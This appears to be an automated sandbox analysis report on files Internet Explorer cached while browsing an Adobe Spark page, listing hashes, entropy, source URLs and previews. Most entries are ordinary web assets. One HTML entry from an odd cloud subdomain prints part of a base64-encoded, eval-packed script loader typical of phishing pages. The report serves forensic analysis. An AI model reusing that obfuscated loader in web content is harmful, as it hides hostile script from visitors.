                                                                                                                                                                                                                                                        Preview: ......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c128 79.159141, 2016/03/22-01:13:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:dfc28c09-91b3-4a6f-b4b7-71c30de60aff" stRef:documentID="adobe:docid:photoshop:88fe6a1c-4e88-1179-af16-f6a1d25c9bdd" stRef:originalDocumentID="xmp.did:7a7371c8-54c7-431d-9b1f-f4993a9b061f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\RC036830be72f242959c7b9ca66cef0c85-file.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):323
                                                                                                                                                                                                                                                        Entropy (8bit):5.286853143462955
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:jwkMKngJv0KgiSP8AlSHS0mCMHDXRMvKyupXMYGGX6SHMWkiezW3T5OtunadXZfJ:jvgeASPRZfRny6cYGkcOeqD5OFdXv/ZJ
                                                                                                                                                                                                                                                        MD5:C3227D3B12693BAACF400A5433937584
                                                                                                                                                                                                                                                        SHA1:3517AD497A87EBB909D3060CB67EE179424AEF69
                                                                                                                                                                                                                                                        SHA-256:B0C9DF48D4E25F293A62DF986B6120EF3C9CA942460A2BD6D94484CB09C4DA91
                                                                                                                                                                                                                                                        SHA-512:D68C489C88213B963DE5DF428B9E5BD9EE30B8025B16DD6562D5F5BBEB33AC4F45408FEB06AF9F2E72A75677C402ADBF4DA727DCCE9892722A4D392A7F1B146D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC036830be72f242959c7b9ca66cef0c85-file.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC036830be72f242959c7b9ca66cef0c85-file.js`.._satellite._poll(function(){_satellite.track("trackMarketoForm")},[function(){if(document.querySelector(".marketoForm")||window.MktoForms2)return!0}],{timeout:1e5,interval:100});
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\SPRK_white@2x[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1518
                                                                                                                                                                                                                                                        Entropy (8bit):5.00107238377263
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:2dfkATLf3+sZ1enVMeN2zQH9nMZ2x0gWXNdIjNN4iWbJ7oIa6d06+:cfkAvfOsZ1302zUj+Td1b+Iaim
                                                                                                                                                                                                                                                        MD5:A29E0C074D7C5E3F6A54CE20C5FEA0AF
                                                                                                                                                                                                                                                        SHA1:8563F7581C1939067B4AA354E78341BC46BD9E1D
                                                                                                                                                                                                                                                        SHA-256:511C77BD64C8D67BE5FC38F107B5005F32F38386A8142CE13753EDABEDD50B86
                                                                                                                                                                                                                                                        SHA-512:50DAC8A1C88FF4369B3199091AC273A4EC482C9C944A4A93DAAF5885C30B30A96469826BE11AAAA890F5393E08FD9CA809AF9E92A836DAC40CB722C13D1E0AE0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/SPRK_white@2x.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 21.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="66px" height="64px" viewBox="0 0 66 64" style="enable-background:new 0 0 66 64;" xml:space="preserve">.<style type="text/css">...st0{fill:none;}...st1{fill:#FFFFFF;}.</style>.<path class="st0" d="M14,62C7.4,62,2,56.6,2,50V14C2,7.4,7.4,2,14,2h38c6.6,0,12,5.4,12,12v36c0,6.6-5.4,12-12,12H14z"/>.<path class="st1" d="M52,4c5.5,0,10,4.5,10,10v36c0,5.5-4.5,10-10,10H14C8.5,60,4,55.5,4,50V14C4,8.5,8.5,4,14,4H52 M52,0H14..C6.3,0,0,6.3,0,14v36c0,7.7,6.3,14,14,14h38c7.7,0,14-6.3,14-14V14C66,6.3,59.7,0,52,0L52,0z"/>.<path class="st1" d="M15.1,42.3C14.9,42.2,15,42,15,41.8v-4.2c0-0.1,0-0.3,0.2-0.1c2,1.4,4.1,2,6.4,2c3.2,0,4.5-1.7,4.5-3.6..c0-1.7-0.9-3-3.9-4.8l-1.6-0.8c-4.5-2.5-5.9-5.1-5.9-8.5c0-4.5,3.1-8.1,9-8.1c2.6,0,4.8,0.4,5.9,1c0.2,0
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\VQ7VQOGF.htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4974
                                                                                                                                                                                                                                                        Entropy (8bit):5.874459921689252
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:St3KxYzwaJTMjSSlR20eMk0V2S1G8GC+LwCnzNTshl2R+IGlA:St3Y+JTMxVeMQKG8r6zN4hU+IGq
                                                                                                                                                                                                                                                        MD5:001D8E7CB39FFCD62CB33BCB0CEE44B8
                                                                                                                                                                                                                                                        SHA1:356AD556EF76120027FAD46377485AAD0DDCB8FA
                                                                                                                                                                                                                                                        SHA-256:31FFA6BAEC76D65C7602CAADF6E772C68CD393A3EAF290E041C3507EDE90D4D7
                                                                                                                                                                                                                                                        SHA-512:6172C016B538142D7568A78D6FF06B8FEC554E756D0BB1E1777EB57719F540FFB441D8738EE9B156A3462E1DCCD6800B4D95AB5DD45D68F317A68429230039FA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://xinviaoafinabatizx.us-south.cf.appdomain.cloud/?bbre=zoxsazx
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta name="viewport" content="width=device-width initial-scale=1 user-scalable=no maximum-scale=1" /><title></title><link href="" rel="shortcut icon" /></head><body class="ZSTgenM2w5tVCJHjuUXcr"><div class="hHspRNj2cgeJf8ouTOWZdbEQ9" id="hEMCZNJWXIBRyVLAfzeOFPd"></div><script>document.write(atob('PHNjcmlwdD5ldmFsKGZ1bmN0aW9uKCRuYnJ1dCwgJHV0bmJyLCAkbmJyLCAkdXQsICR1eW4sICR5dW4pIHskdXluPWZ1bmN0aW9uKCRjaGFyQ29kZSkge3JldHVybiAoJGNoYXJDb2RlIDwgJHV0bmJyID8gJycgOiAkdXluKHBhcnNlSW50KCRjaGFyQ29kZSAvICR1dG5icikpKSArKCgkY2hhckNvZGUgPSAkY2hhckNvZGUgJSAkdXRuYnIpID4gMzUgPyBTdHJpbmcuZnJvbUNoYXJDb2RlKCRjaGFyQ29kZSArIDI5KSA6ICRjaGFyQ29kZS50b1N0cmluZygzNikpO307ICAgIGlmICghJycucmVwbGFjZSgvXi8sIFN0cmluZykpIHt3aGlsZSAoJG5ici0tKSB7JHl1blskdXluKCRuYnIpXSA9ICR1dFskbmJyXSB8fCAkdXluKCRuYnIpO30kdXQgPSBbZnVuY3Rpb24gKCRlbmNvZGVkKSB7cmV0dXJuICR5dW5bJGVuY29kZWRdfV07JHV5biA9IGZ1bmN0aW9uICgpIHtyZXR1cm4gJ1xcdysnfTskbmJyID0gMTt9
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\arrow-down-white[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):457
                                                                                                                                                                                                                                                        Entropy (8bit):5.337403808865378
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBdbjBubdgXRxVnzVEn6VWB3qmc4slZKYnic4sf3nU6AqOrbq6jHzhMdAuOS:TMHdPBu5i/nzVJ/KYf3n2NrPHCT
                                                                                                                                                                                                                                                        MD5:65C98FE770DF88672CDC4286AB61235D
                                                                                                                                                                                                                                                        SHA1:CD8889551C6FCC6A9B48D63F311019CC24DEF75F
                                                                                                                                                                                                                                                        SHA-256:6FCB3483F32434F91E4BA90A5A728AD5AD1C402A4929B991098B5FCFEA4D2F9D
                                                                                                                                                                                                                                                        SHA-512:3B8DDDF3416B0559AFCB9371D0B14F3941836A921B3593419CC47417F377D65BCB252C13EDAB07D1AD5C00D2D51B06C004D5C5DB812090741AE77E647D49EB61
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/landing/arrow-down-white.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 20.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 10 5" style="enable-background:new 0 0 10 5;" xml:space="preserve">.<style type="text/css">...st0{fill:#FFFFFF;}.</style>.<path id="caret" class="st0" d="M0,0l5,5l5-5L0,0z"/>.</svg>.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\base-fonts.gz[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                        Entropy (8bit):4.675124266644529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:yLRmcpZBLvG/tLAfimqW7RmMe:yL/pZtvG1AiMRmMe
                                                                                                                                                                                                                                                        MD5:1C75FB60A6530DC7F95725DED413DC13
                                                                                                                                                                                                                                                        SHA1:A6F43A1C5E1039C212879090EFA6411008528FAD
                                                                                                                                                                                                                                                        SHA-256:E99BEC104ED648FAB6ECA0D41AB2B793A05E6A3305B24483C681C5BD5CF5C325
                                                                                                                                                                                                                                                        SHA-512:6C606EEE1E84DAD4064F4F579FE7AA95C028167474BE75A9486996E368E3717FD5252D98652F98E0128324F92957C241B44B79B6502925EF8B8F2B9F4A3A7500
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/base-fonts.gz.js
                                                                                                                                                                                                                                                        Preview: document.write('<script src="//use.typekit.net/onz5gap.js"><\/script>');
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\browser-icon-firefox[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 126 x 126, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):23048
                                                                                                                                                                                                                                                        Entropy (8bit):7.9780311101032595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:we/3EjkOuVoC1api2CeizbIn15L2/A0hF7S8Q24cMTbJ6KtgDeu47SFpdnRYsJJ5:t0QaCEpxHOMnPyz3FMTbJKu7STdnRRJn
                                                                                                                                                                                                                                                        MD5:CB5D8684D59755A275761D3FD5A3DE21
                                                                                                                                                                                                                                                        SHA1:F69AB8011CD09A7A77536F8C227CE05981DB7791
                                                                                                                                                                                                                                                        SHA-256:180764AE8307B091F22104F366FAE7830DF994763C613977F4F3EE70D194A695
                                                                                                                                                                                                                                                        SHA-512:44B86DE85BD786152AF0600528E9EA1BFB5494FDD9A01D9D795A892B765DDEABFD45AB7AF18A8D1250E70795863F1168256025FEDD7EFE29C9F1AFB3DCF726D6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/landing/browser-icon-firefox.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...~...~......#......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:5F7D65790FF011E69AFE8E50F5F6CE89" xmpMM:DocumentID="xmp.did:5F7D657A0FF011E69AFE8E50F5F6CE89"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5F7D65770FF011E69AFE8E50F5F6CE89" stRef:documentID="xmp.did:5F7D65780FF011E69AFE8E50F5F6CE89"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>wF.r..VvIDATx....%Uy/....|.>...f.U...C08F$OM...I.3&.$..#.\5&...5.$.5...8.( .43..<..3.y.....VU.....n.H..?...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\cc11c7a4-3395-428b-9d98-bf562dee9fff[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1024 x 404, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):253180
                                                                                                                                                                                                                                                        Entropy (8bit):7.972559650710546
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:4th8CE4cLmXSTVWgms5vPP5fXr2/uD5D/rA9M1hJ7CADTovSVtE7jPNumfQQh5rv:AeCsmiishPPBC/e5laiTpVtE7n4cNYkx
                                                                                                                                                                                                                                                        MD5:F46F0FA3B27AD3A40BD275D74214552E
                                                                                                                                                                                                                                                        SHA1:4F1BFAFF77CBFF818A3EA009AA9FF52661310BAA
                                                                                                                                                                                                                                                        SHA-256:808D8C4E0482AFE47912D8E2A5540D16225CF1D901BE275C0AF24B67937CF9C0
                                                                                                                                                                                                                                                        SHA-512:AC429E6FE71267CC53F0DDD941D10F2F444720C83211A7B9C758A4051666C5FE8E0531F6CD3F49083621349B57BD1138889A9DB1E3B0C53C94C14637C5563405
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/page/GG8mUEsjQvSUh/images/cc11c7a4-3395-428b-9d98-bf562dee9fff.png?asset_id=ecd5146c-766b-46a9-9dcc-646d4f3a4baa&img_etag=%22cbca1d5e1d77d78ef66008afffa25830%22&size=1024
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...............Pq....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/">. <xmpMM:DerivedFrom rdf:parseType="Resource"/>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.<?xpacket end="r"?> . . . . .
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\d[1]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 58640, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):58640
                                                                                                                                                                                                                                                        Entropy (8bit):7.993859236860105
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:768:G23+QzXz1F2u0rMcQSwJzZaudOh9lL9cvXjy+KNKzRM+17SabAK9zauA+uhRnmTM:GOzD2/rM7mWO3GjhKNKK+E6auAtMgJp
                                                                                                                                                                                                                                                        MD5:AB2058631920729DAEA04A14330239E6
                                                                                                                                                                                                                                                        SHA1:75A3B6A23B5827E1846CBE040E40EBD6BA494272
                                                                                                                                                                                                                                                        SHA-256:2E5A6085B998F5B4EA3EE7B2FF61C59F7A7D66F22166F49029EB42A45793A220
                                                                                                                                                                                                                                                        SHA-512:880389F4AF9597A1B761529A5DFFC4C613F2FDAB143E7DA00BB36C0377AFD2FFF74917DDB6CD52CDED2980A19B11EDD732EC7BF381F36CB30975EFE1D2AF9C43
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/d?primer=388f68b35a7cbf1ee3543172445c23e26935269fadd3b392a13ac7b2903677eb&fvd=n4&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..........S.........................BASE...D...F...Fe$].CFF ...4...N.......DYNA................GDYN...|... ...QJ0..GPOS......!...On.W;.GSUB...4.......N`^.iOS/2.......Y...`\Wv.cmap...,.......(..U.head.......4...6..%uhhea.......!...$...Ghmtx.......6...D.gD.maxp...,..........P.name...............post........... ...2..............ideoromn..DFLT..cyrl..grek..latn...................\......x.c`d```5.:8Gem<..W.f..@.....0....^....@.3..H..d..kx.RKn.0..9N...Qt.5.v... .Wv..Y%...%....cH......g...g..:.X4M.."(.{ofH>..k|.....l..W.Z...L.>.;.8.%'w..C..>..|r..>>S.u_2*..a.o....z....|.>:.%....o...}g.p.Ig.(...b...-....7..U....b..b..S..nt.c.._.:.gz...u$.~4._O.#[..sWd.v2}"..u.U.hUws.H..(..*w./...GE..Y.<K...h...1.K.7...dF.....7.z...0.W......8.Dc,Q!.&......W.J,X.......V.s..a....F._M..1.._Q..RZ....cr#..^w.....e...T..?S..[...J.v7.wY1...u...{!m7.3)Y.....y.....Z.qC.#g.lN...#;.....}.aW/.s..}...~.N.....7...#.C.;. .......x.c`f|.8.......).....B3.1.1*.E.Y..XX..X......P............
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\d[2]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 58140, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):58140
                                                                                                                                                                                                                                                        Entropy (8bit):7.993838405349219
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:+dG3UnOA8RFJKrWMC4ArrtNJQCjfKxLojn:+dGk2NKrWMC42psCjSpo
                                                                                                                                                                                                                                                        MD5:5BDBAC45C303FAE0D497E3EA06A27A7F
                                                                                                                                                                                                                                                        SHA1:1816C0EF35D230FA3A177E9F719BA03DEEA73B25
                                                                                                                                                                                                                                                        SHA-256:32CC0B7A4C262A62A171D801F5B0EB36E8FD320B0D10D81189F6FB4F43894621
                                                                                                                                                                                                                                                        SHA-512:0BF6B8340105B326B32F491CF784CA487DC28DB0D8B7430CC5CA00CE89F4EB752BB078606ACF104F1F93866CC1C84E94F5A2704D604E59452BE724D21E788CDD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/d?primer=388f68b35a7cbf1ee3543172445c23e26935269fadd3b392a13ac7b2903677eb&fvd=n7&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..........Q.........................BASE...D...F...Fe!].CFF ...8.......|Cz.vDYNA.............T..GDYN....... ...Q?cE.GPOS......!a..Oz.].`GSUB...d.......N`^.iOS/2.......Y...`].y.cmap...8.......(..U.head.......5...6..%ghhea.......!...$...Bhmtx...........DD.@Cmaxp...0..........P.name............E@..post...$....... ...2..............ideoromn..DFLT..cyrl..grek..latn...................Y......x.c`d```5....fF<..W.f..@....^0....~.).......@..y......x.}..n.0...t..B.\q...s.D..UB.[.v...&..I.w...%.*....@....Ix..8....r.........+|...9......:......w.f...C|r|..xp|...0..?..w..^{..........s...C..7.Gx.{...Y.... ..\gJ...Qe#......N.......oW..3.zGc.?/TZMt..2....d:...8i=4^M...7.n..]..\.2...J...vb .y...t..Y.b..2..0..$^..=.}......}uW...<y.l.E.$.=..".HHc....s....K~......5...Z_.i.............S>.....,..&....c....}j.g.._1...j....V.2..c.k..=....hYQe.9+V-.k}.w7..d...%...f6>.sh....;.=<..a..-5.f2...\.pGu.}W.G....kJ.........x.c`f.........).....B3.1.1..E.9..XX..X......P.......
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\d[3]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 58264, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):58264
                                                                                                                                                                                                                                                        Entropy (8bit):7.992987316761491
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:ysFA+QggYXkhr/65gGFsrge1aT8IHKksD1cUiS9XjIY:L6L1YXkJ/6KW6gQaT8IHK3fioUY
                                                                                                                                                                                                                                                        MD5:E81C892E355CD99A8D3119D358ADA72E
                                                                                                                                                                                                                                                        SHA1:F1267F500B7DDF4924CF599E8B53F4B389BBA362
                                                                                                                                                                                                                                                        SHA-256:714DEFCA2714E79B9293FCC2468945C0AAFDB11D2718BC623A5C974B2A56A5B6
                                                                                                                                                                                                                                                        SHA-512:DB31A35952B0BCF7A7668C66A68223D0E80FB73012F1CBE7D293A9AB03F8FE8F03C80827DAAB3509A0A856DF3CEA3F1990CD6621600501EA2778675AC2E757C0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/37eaae/00000000000000003b9b3f83/27/d?primer=388f68b35a7cbf1ee3543172445c23e26935269fadd3b392a13ac7b2903677eb&fvd=n3&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO.........T\........................BASE...D...F...Fe(].CFF ...4...2...B.<?.DYNA...h............GDYN...`.......Q.t..GPOS......!K..OL....GSUB...........N`^.iOS/2.......W...`[.tJcmap..........(..U.head.......4...6..%`hhea.......!...$...Khmtx...x...%...D..H.maxp...,..........P.name.............8..post.......... ...2..............ideoromn..DFLT..cyrl..grek..latn...................`......x.c`d```5.Z...8...+.3........P..?.?....1 ....$..N...x.RMn.@.}&$U7.......-+.V. 5R$"...a... {.......r....^.G.*.y<mQ.....|.g......Cs]q6..[....+|p...0u.M...s.....f~u......_s.....{..-t.O..a.}q.M....Qz....h..w..>?._...-.X...2:..].(.]QFF/.....%..LW....oR....fz..Fe(.^8..'C+..K.`u:..g|.e...h..s.K..pS.E..EO*y...h....i..2..@....cv..9..61rQd].#U]....A.....!.Cq.FX.@.M<....q.... [....rKH.K9.fH..LeW.OM..)..o..L....j..O.".Bz|..!...b..E.R.e\.e4.U..........B..i;.X.Pel.r.....$...l..-.j......v.l.......r.~..U[.).....u."V'F.....O.G......x.c`f.........................L,,LL,..L.@yF.(ptqr.R..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\d[4]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 46708, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):46708
                                                                                                                                                                                                                                                        Entropy (8bit):7.9926123068799795
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:768:Ljq+IGHkF+BPu/95GrYWlwFegdvV4HKLXGcbdLapCdmt5FXbJ40/VnLpvLw4T2Fe:PQse4Ps95oYWluvnXFbdLaBFXrtvLw4Z
                                                                                                                                                                                                                                                        MD5:56C4BECEB8718DBA19272C320458617D
                                                                                                                                                                                                                                                        SHA1:5251C59F6956B0EA50D9B4A21992B869772A0AE2
                                                                                                                                                                                                                                                        SHA-256:E89CE18105C28942D113F667B17D952129C0B66D3101DF0D38C18A42DDED47A5
                                                                                                                                                                                                                                                        SHA-512:B3FCA99F08D59640AD8769D7E84DA332B9A5513CFD6685B2D8E8EF0677975D74B5B84DE87D0A35DECE9F6C7D49BE295A0734B83896FADA2A5160E28131895863
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/aa41d0/00000000000000003b9b3f86/27/d?primer=388f68b35a7cbf1ee3543172445c23e26935269fadd3b392a13ac7b2903677eb&fvd=i4&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO...t.......T........................BASE...D...F...Fe$].CFF ...4...u.....&..DYNA...........|..IlGDYN...|.........e..GPOS...p... ..0.....GSUB..............t.OS/2.......[...`\Xv.cmap...........(..TIhead.......4...6.:%Fhhea.......$...$.$.ihmtx...x........VH @maxp...,.........kP.name...........~.'..post...|....... ...2..............ideoromn..DFLT..cyrl..grek..latn...................\......x.c`d```5.:>K.z<..W.f..@.....0....n.C..L..@..._4..x.uRKn.0..9...m.U.]..@(Y..;..N...6.$.`}\.1.#....A.=I....I..8|of..$..........p...z.X|.O.lq........=..7.O...UN.....,v..YZ..['...W.W...|........>v.,>E.Y>....b.*c%..Z....").]YEZ...g.....]...U.g.._g**f:..$.~?..o&....L3t;.>./UU.e!Z..B.....IY.E_z."...V.z-.4.e(...h..t]}.m.eR.z....y.x....9.!.......B...x..jh....N...3...V.F.q.....fj.S\..{.|..M..KAg.5.6AH../.bD.....A.t.UgF.n....KSAM..;..;...4......=.V-.kr..n.lN.-.......C3....j..h.....f.w.o.oN..Wx..b......!g.z.8........x.c`f..8.......)....o......`....fefba.dbQ``jg```d..G.'W O..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\en[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):236125
                                                                                                                                                                                                                                                        Entropy (8bit):5.241839181610481
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:O9BCW6xUvmbH4bWdCQx23kISzbZYVlH3ShC2ZmwQZMLrgizZrZixqwTUQxcsVFoQ:UBCZCaHDzbSmKwQZ2k4kTRCTHSE1Q7B
                                                                                                                                                                                                                                                        MD5:64260D8365E59085E6E91E554487EB6D
                                                                                                                                                                                                                                                        SHA1:83272011769DF702916D6DA5875591138F616BDF
                                                                                                                                                                                                                                                        SHA-256:194D4EA20F2C9834477F36A1A9C307F86C1E833C79420637C3CC42A17CAF1870
                                                                                                                                                                                                                                                        SHA-512:307714B2FF3785F3E5C77C57CE55E55216EA32B7A366436A04D2D8B5F2B151E70E4242989311D170FA95757BF70130E56E42427A9F508557473ACE999BED826D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://cdn.cookielaw.org/consent/7a5eb705-95ed-4cc4-a11d-0cc5760e93db/394a4f88-7fe0-49f1-924d-a901a0001be9/en.json
